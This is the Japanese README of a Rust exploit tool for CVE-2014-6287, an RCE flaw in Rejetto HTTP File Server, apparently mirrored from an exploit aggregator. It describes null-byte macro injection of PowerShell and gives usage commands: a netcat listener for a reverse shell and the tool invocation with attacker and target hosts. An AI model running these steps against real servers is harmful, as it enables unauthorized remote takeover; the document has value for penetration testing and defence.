## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-NIKA0X38-CVE-2014-6287
# CVE-2014-6287 - Rejetto HTTP File Server RCE エクスプロイト
 
CVE-2014-6287 エクスプロイトの Rust 実装。Rejetto HTTP File Server (HFS) バージョン 2.3x(2.3c より前)を標的とします。
## 脆弱性の概要
**CVE-2014-6287** は、Rejetto HTTP File Server (HFS) における重大なリモートコード実行の脆弱性です。
### 技術的詳細
* **影響を受けるソフトウェア** : Rejetto HTTP File Server (HFS) 2.3x(2.3c より前)
* **脆弱性の種類** : リモートコード実行 (RCE)
* **CVSS スコア** : 10.0 (Critical)
* **CWE** : CWE-94(コード生成の制御が不適切)
### 説明
Rejetto HTTP File Server の `parserLib.pas` 内の `findMacroMarker` 関数は、検索アクション内の `%00` シーケンスを介して、リモートの攻撃者が任意のプログラムを実行することを可能にします。この脆弱性により、攻撃者は入力検証を回避し、ターゲットシステム上で実行される悪意のあるコードを注入できます。
このエクスプロイトは次のように動作します:
1. ヌルバイト (`%00`) を含む悪意のある検索クエリを作成する
2. マクロ区切り文字 `{.` と `.}` 内に PowerShell コマンドを注入する
3. サーバーがマクロを処理し、埋め込まれた PowerShell コードを実行する
4. 攻撃者へのリバースシェル接続を確立する
## 使用方法
### ステップ 1: Netcat リスナーをセットアップする
エクスプロイトを実行する前に、攻撃マシン上でリバースシェルを受け取るためのリスナーをセットアップします:
root@kitploit:~
# <LPORT> を使用したいリッスンポートに置き換えてください
nc -lvnp <LPORT>
### ステップ 2: エクスプロイトを実行する
root@kitploit:~
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]
#### 必須パラメータ:
* `-l, --lhost <LHOST>`: ローカル IP アドレス(攻撃マシン)
* `-p, --lport <LPORT>`: リバースシェル用のローカルポート
* `-r, --rhost <RHOST>`: ターゲット IP アドレス(脆弱な HFS サーバー)
#### オプションパラメータ:
* `-t, --rport <RPORT>`: ターゲットポート(デフォルト: 80)
## 免責事項
このツールは教育目的および許可された侵入テスト目的のみに使用してください。責任を持って、所有しているシステムまたは明示的な許可を得たシステムに対してのみ使用してください。